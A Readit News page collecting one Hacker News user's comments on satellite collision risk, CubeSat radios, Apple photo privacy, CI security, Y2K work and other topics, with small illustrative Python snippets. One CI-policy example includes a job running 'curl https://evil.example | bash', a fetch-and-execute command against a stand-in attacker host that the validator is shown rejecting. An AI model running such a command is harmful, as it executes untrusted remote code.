Readit News
rzimmerman commented on An Orbital House of Cards: Frequent Megaconstellation Close Conjunctions   arxiv.org/abs/2512.09643... · Posted by u/rapnie
brookst · 11 days ago
And wouldn’t the solar panels have less cross section than the satellite bodies, so even an apparent collision might just be a very near miss? (Honest question, not rhetorical, could be I’m wrong)
rzimmerman · 11 days ago
Yeah, the solar array on Starlink is held perpendicular to the velocity vector, so the cross section presented to a colliding body will invariably be smaller than the worst case.
rzimmerman commented on An Orbital House of Cards: Frequent Megaconstellation Close Conjunctions   arxiv.org/abs/2512.09643... · Posted by u/rapnie
rzimmerman · 11 days ago
It's interesting to try to create a metric of collision avoidance "stress" and resiliency to outages. I don't think this is a particularly useful one (and the title is alarmist/flamebait), but it is a first cut at something new. A more nuanced aggregate strategy for different orbital altitudes would make sense. Maybe someone can suggest (or has already suggested) a comprehensive way to keep the risk of cascading debris events low (and measured) in a form that's useful for launch planning.

Complete loss of control of the entire Starlink constellation (or any megaconstellation) for days at a time would be an intense event. Any environmental cause (a solar event, say) would be catastrophic ground-side as well. Starlink satellites will decay and re-enter pretty quickly if they lose attitude control, so it's a bit of a race between collisions and drag. Starlink solar arrays are quite large drag surfaces, and the resulting orbital decay probably makes collisions less likely. I would not be surprised if the satellites are designed to deorbit without ground contact for some period of time. I'm sure SpaceX has done some interesting math on this, and I'd love to see it.

Collision avoidance warnings are public (with an account): https://www.space-track.org/. Importantly, they are intended to be actionable, conservative warnings a few days to a week out. They overstate the probability based on assumptions similar to this paper's (estimates of cross-sectional area, uncertainty in orbital knowledge from ground radar, no knowledge of attitude control or future maneuvers). Operators like SpaceX will take these and use their own high-fidelity knowledge (from onboard GPS) to get a less conservative, more realistic probability assessment. These probabilities invariably decrease over time as the uncertainty gets lower. Starlink satellites are constantly under thrust to stay in a low orbit with a big, draggy solar array, so a "collision avoidance maneuver" for them is really just a slight change to the thrust profile.
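
To illustrate how much those assumptions matter, here's a toy Monte Carlo estimate of collision probability in the encounter plane (isotropic Gaussian position uncertainty and a circular combined hard body; nothing like an operational screening, and all the numbers are made up):

```python
import numpy as np

def collision_probability(miss_km, sigma_km, radius_km, n=2_000_000, seed=0):
    """Toy Monte Carlo estimate of Pc in the encounter plane.

    Assumes an isotropic Gaussian relative-position uncertainty (sigma_km)
    around the nominal miss distance and a circular combined hard body
    (radius_km). Real screenings use full covariances, not this.
    """
    rng = np.random.default_rng(seed)
    # Sample the relative position at closest approach.
    samples = rng.normal(loc=[miss_km, 0.0], scale=sigma_km, size=(n, 2))
    return float(np.mean(np.linalg.norm(samples, axis=1) <= radius_km))

# Conservative screening-style assumptions (coarse covariance, generous
# hard-body radius) produce a probability worth flagging...
print(collision_probability(miss_km=0.5, sigma_km=1.0, radius_km=0.02))
# ...while refined knowledge (tight covariance from onboard GPS, realistic
# cross section) can drive the same conjunction to effectively zero.
print(collision_probability(miss_km=0.5, sigma_km=0.05, radius_km=0.005))
```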

Interesting stuff in the paper, but I'm annoyed at the title. I hate when people fear-bait about Kessler syndrome against some of the more responsible actors.

rzimmerman commented on CubeSats are fascinating learning tools for space   jeffgeerling.com/blog/202... · Posted by u/warrenm
bilsbie · 3 months ago
I’m really confused about how you communicate with it. That seems like the most expensive(?) and technically difficult part.

I’ve got some cool ideas for atmospheric reentry, but I’d imagine there are all kinds of permits needed?

rzimmerman · 3 months ago
If you're interested in building something, Planet released an open source hardware/software satellite radio that works over amateur radio bands for ~$50: https://github.com/OpenLST/openlst
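
For a rough sense of the ground-side half, here's a generic sketch of pushing a framed command to a serial-attached radio board with pyserial. The port, baud rate, and frame layout are placeholders for illustration only, not OpenLST's actual interface; the repo ships its own ground tools.

```python
# Generic sketch: send a framed command to a radio board over UART and read
# a reply. The framing here is invented, not the OpenLST protocol.
import struct

import serial  # pip install pyserial

def send_command(port: str, payload: bytes) -> bytes:
    with serial.Serial(port, baudrate=115200, timeout=2.0) as radio:
        # Placeholder framing: 2-byte sync word, 1-byte length, payload.
        frame = b"\xAA\x55" + struct.pack("B", len(payload)) + payload
        radio.write(frame)
        return radio.read(256)  # whatever the board sends back

if __name__ == "__main__":
    print(send_command("/dev/ttyUSB0", b"PING").hex())
```
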
rzimmerman commented on Apple Photos phones home on iOS 18 and macOS 15   lapcatsoftware.com/articl... · Posted by u/latexr
mrshadowgoose · a year ago
> a legal requirement to scan photos

Can you provide documentation demonstrating this requirement in the United States? It is widely understood that no such requirement exists.

There's no need to compromise with any requirement, this was entirely voluntary on Apple's part. That's why people were upset.

> I can't believe how uninformed

Oh the irony.

rzimmerman · a year ago
Should have said "potential legal requirement". There was a persistent threat of blocking the use of E2E encryption for this exact reason.
rzimmerman commented on Apple Photos phones home on iOS 18 and macOS 15   lapcatsoftware.com/articl... · Posted by u/latexr
EagnaIonat · a year ago
That whole incident was so misinformed.

CSAM scanning takes place in the cloud with all the major players. The hash database only covers the worst of the worst material out there.

What Apple (and others) do is allow files to be scanned unencrypted on the server.

The feature Apple wanted to add would scan files on the device and flag anything that matched.

A flagged file could then be decrypted on the server and checked by a human. Everything else was encrypted in a way that it couldn't be looked at.

If you had iCloud disabled, it did nothing.

The intent was to protect data and children, and to reduce the amount of processing done on the server end to analyse everything.

Everyone lost their minds, yet it was all clearly laid out in the papers Apple released on it.

rzimmerman · a year ago
I can't believe how uninformed, angry, and still willing to argue about it people were over this. The whole point was a very reasonable compromise between a legal requirement to scan photos and keeping photos end-to-end encrypted for the user. You can say the scanning requirement is wrong; there are plenty of arguments for that. But Apple went so far above and beyond to try to keep photo content private and provide E2E encryption while still trying to follow the spirit of the law. No other big tech company even bothers, and somehow Apple is the outrage target.
rzimmerman commented on Apple Photos phones home on iOS 18 and macOS 15   lapcatsoftware.com/articl... · Posted by u/latexr
rzimmerman · a year ago
If your core concern is privacy, surely you'd be fine with "no bytes ever leave my device". But that's a big-hammer way to ensure no one sees your private data. What about external (iCloud/general cloud) storage? That's pretty useful, and if all your data is encrypted in such a way that only you can read it, would you consider that private? If done properly, I would say that meets the goal.

What if, in addition to storage, I'd like to use some form of cloud compute on my data? If my device preprocesses/anonymizes my data, and the server involved uses homomorphic encryption so that it also can't read my data, is that not also good enough? Given how far above and beyond Apple has gone with this simple service to actually preserve user privacy, the backlash is frustrating.

I get that enabling things by default triggers some old wounds. But I can understand the argument that it's okay to enable off-device use of personal data IF it's completely anonymous and privacy preserving. That actually seems very reasonable. None of the other mega-tech companies come close to this standard.
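
To make the homomorphic-encryption idea concrete, here's a minimal sketch using the python-paillier (`phe`) library: the server works only with ciphertexts and still computes a useful result. This is just the general concept, not what Apple ships (their photos feature uses a different HE scheme for encrypted nearest-neighbor lookups), and the numbers are made up.

```python
# Toy demo of additively homomorphic encryption with python-paillier
# ("pip install phe"). The client encrypts values; the server computes on
# the ciphertexts without ever being able to decrypt them.
from phe import paillier

# Client side: generate keys and encrypt some private data.
public_key, private_key = paillier.generate_paillier_keypair()
private_values = [3.5, 7.25, 11.0]  # made-up numbers
encrypted = [public_key.encrypt(v) for v in private_values]

# "Server" side: sees only the public key and ciphertexts, yet can still
# compute an encrypted weighted sum.
weights = [0.2, 0.3, 0.5]
encrypted_result = encrypted[0] * weights[0]
for ciphertext, weight in zip(encrypted[1:], weights[1:]):
    encrypted_result = encrypted_result + ciphertext * weight

# Client side: only the private key holder can read the result (~8.375).
print(private_key.decrypt(encrypted_result))
```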

rzimmerman commented on Zizmor would have caught the Ultralytics workflow vulnerability   blog.yossarian.net/2024/1... · Posted by u/campuscodi
RainyDayTmrw · a year ago
Why has CI for open-source projects become so difficult to secure? Where did we, collectively, go wrong?

I suppose, it's probably some combination of: CI is configured in-band in the repo, PRs are potentially untrusted, CI uses the latest state of config on a potentially untrusted branch, we still want CI on untrusted branches, CI needs to run arbitrary code, CI has access to secrets and privileged operations.

Maybe it's too many degrees-of-freedom creating too much surface area. Maybe we could get by with a much more limited subset, at least by default.

I've been doing CI stuff in my last two day jobs. In contrast, we worked only on private repos with private collaborators, and we explicitly designated CI as trusted.

rzimmerman · a year ago
It's a web of danger for sure. Configuring CI in-repo is popular (especially in the GitLab world), and it's admittedly a low-friction way to at least get people to keep CI under configuration control (or use CI for builds at all). I think the number of degrees of freedom is really a footgun.

I remember early GitLab Runner use when I had a (seemingly) standard build for a Docker image. There wasn't any obvious standard way to do it. There were recommendations for dind (Docker-in-Docker), just giving shell access, etc. There's so much customization that it's hard to decide what's safe for a protected/main branch vs. user branches.

I don't have a solution. But I think it would be better if, by default, CI engines were a lot less configurable and forced users to adjust their repo and build to match some standard configurations, like:

- Run `make` in a Debian docker image and extract this binary file/.deb after installing some apt packages

- Run `docker build .` and push the image somewhere

- Run `go build` in a standard golang container

And really made you dance a little more to do things like "just run this bash script in the repo". Restrict those kinds of builds to protected branches/special setups.

Having the CI config in the same source control tree is dangerous and hard to secure. It would probably be better to have some kind of headless branch, like GitHub Pages uses, that is just for CI config.
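
As a sketch of what "less configurable by default" could look like, here's a hypothetical pre-flight check that only accepts jobs drawn from a small allow-list of standard templates like the ones above; anything custom has to run on a trusted branch. The template names and config shape are invented for illustration, and this isn't how GitLab or GitHub Actions actually work.

```python
# Hypothetical policy check for a deliberately restricted CI system.
# Jobs must reference one of a few blessed templates; free-form scripts are
# rejected unless the branch is explicitly trusted/protected.
from dataclasses import dataclass

ALLOWED_TEMPLATES = {
    "debian-make",   # run `make` in a pinned Debian image, export artifacts
    "docker-build",  # run `docker build .` and push to a fixed registry
    "go-build",      # run `go build` in a standard golang container
}

@dataclass
class Job:
    name: str
    template: str | None = None      # one of ALLOWED_TEMPLATES
    script: list[str] | None = None  # free-form steps (the dangerous part)

def validate(jobs: list[Job], branch_is_trusted: bool) -> list[str]:
    """Return a list of policy violations for this pipeline."""
    errors = []
    for job in jobs:
        if job.template in ALLOWED_TEMPLATES and not job.script:
            continue  # standard, low-risk configuration
        if job.script and not branch_is_trusted:
            errors.append(f"{job.name}: custom scripts need a trusted branch")
        if job.template is not None and job.template not in ALLOWED_TEMPLATES:
            errors.append(f"{job.name}: unknown template '{job.template}'")
    return errors

# Example: a fork PR that tries to run an arbitrary script gets flagged.
print(validate([Job("build", template="go-build"),
                Job("sneaky", script=["curl https://evil.example | bash"])],
               branch_is_trusted=False))
```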

rzimmerman commented on My fake job in Y2K preparedness   nplusonemag.com/issue-48/... · Posted by u/bookofjoe
rzimmerman · a year ago
I worked for about a year with a consulting firm that handled "Y2K compliance". Unlike this Andersen exercise in legal face-saving, it was a real job. Big companies hired us to do a full inventory of their site equipment (including manufacturing plants and pharma facilities) and go line by line with their vendors to figure out which components had known Y2K issues, which hadn't been tested at all, and which were fine or had simple fixes. We helped them replace and fix what needed to be fixed.

Y2K was a real problem. The end-of-the-world blackouts and planes falling from the sky were sensationalism, but there were real issues, and most of them got fixed. I'm not trying to take away from this very interesting story of corrupt cronyism, but there were serious people dealing with serious problems out there. "Remember Y2K? Nothing happened!" is a super toxic lesson to take away from a rare success where people came together and fixed something instead of firefighting a disaster.

rzimmerman commented on Parents outraged at Snoo after smart bassinet company charges fee to rock crib   independent.co.uk/news/wo... · Posted by u/pseudolus
rzimmerman · a year ago
The Snoo is great, and the key feature that actually helps prevent SIDS is the restraints and swaddle, which are not being moved to a subscription here. It's actually FDA-approved to reduce the risk of SIDS. The "bonus" rocking and soothing noises just help parents get more sleep.

The Snoo is very expensive and easy to pass down or buy used. I think they probably screwed up by selling it outright. You can rent the Snoo, which is probably a better model for everyone. This is kind of a janky way to pull back some of the rental revenue they lost by selling a durable product that people only need for a few months.

It feels gross, I get it. But it's effectively a $100-per-child fee, which is quite reasonable given the benefits. And there's no realistic way to charge for that other than a subscription for the premium (non-safety) features. The alternative is to keep developing new models with new features and adding crap people don't need. One thing I love about the original Snoo is that it works fine without an Internet connection or the app. I used the app and it was great, but it's nice to know that when you travel or lose power, it can still rock your baby and soothe them. I hope that's still the case if there's a subscription involved.

rzimmerman commented on What you learn by making a new programming language   ntietz.com/blog/you-shoul... · Posted by u/kaycebasques
rzimmerman · a year ago
I spent time on a compile-to-JS language and found it very rewarding: https://github.com/rzimmerman/kal

This was before async/generators were added to JS, and callback hell was quite real. I wanted to shape it the way I’d learned to program in Visual Basic: very human-readable. The result is no longer useful, but it was a fun goal to have the compiler compile itself.
